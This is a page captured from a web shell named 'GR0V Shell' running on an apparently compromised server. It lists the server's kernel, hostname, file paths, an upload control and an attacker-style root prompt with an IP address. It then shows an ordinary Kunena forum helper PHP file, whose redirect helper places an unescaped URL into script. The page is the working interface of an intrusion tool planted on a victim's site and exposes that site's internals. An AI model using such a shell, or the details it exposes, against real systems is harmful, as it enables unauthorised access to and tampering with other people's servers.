? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/board/administrator/components/com_kunena/lib/
File Upload :
Current File : /home/admin/public_html/old/board/administrator/components/com_kunena/lib/kunena.helpers.php

<?php
/**
* @version $Id: kunena.helpers.php 713 2009-05-12 05:59:53Z mahagr $
* Kunena Component
* @package Kunena
*
* @Copyright (C) 2008 - 2009 Kunena Team All rights reserved
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
* @link http://www.kunena.com
*
* Based on FireBoard Component
* @Copyright (C) 2006 - 2007 Best Of Joomla All rights reserved
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
* @link http://www.bestofjoomla.com
*
* Based on Joomlaboard Component
* @copyright (C) 2000 - 2004 TSMF / Jan de Graaff / All Rights Reserved
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
* @author TSMF & Jan de Graaff
**/

// Dont allow direct linking
defined( '_JEXEC' ) or die('Restricted access');



function fbJsEscape($msg)
{
    // escape javascript quotes and backslashes, newlines, etc.
    static $convertions = array
    (
        '\\' => '\\\\',
        "'" => "\\'",
        '"' => '\\"',
        "\r" => '\\r',
        "\n" => '\\n',
        '</' => '<\/'
    );

    return strtr($msg, $convertions);
}

function fbAlert($msg)
{
    $msg = fbJsEscape($msg);
    echo "<script> alert('$msg'); </script>\n";
}

function fbAssertOrGoBack($predicate, $msg)
{
    $app =& JFactory::getApplication();
    if (!$predicate)
    {
        $msg = fbJsEscape($msg);
        echo "<script> alert('$msg'); window.history.go(-1); </script>\n";
        $app->close();
    }
}

function fbAssertOrGoTo($predicate, $msg, $url)
{
    if (!$predicate)
    {
        $msg = fbJsEscape($msg);
        $url = JRoute::_($url);
        echo "<script> alert('$msg'); window.location=$url'; </script>\n";
    }
}

// FIXME: deprecated
function fbSetTimeout($url, $time, $script = 1)
{
    $url = JRoute::_($url);

    if ($script)
        echo CKunenaLink::GetAutoRedirectHTML($url, $time);
    else
        echo 'setTimeout("location=\'' . $url . '\'",$time)';
}

function fbRedirect($url, $time, $msg)
{
    echo '<script language="javascript">';
    echo 'alert(\'' . fbJsEscape($msg) . '\')';
    fbSetTimeout($url, $time, 0);
    echo '</script>';
}
?>

T1KUS90T
  root-grov@210.1.60.28:~$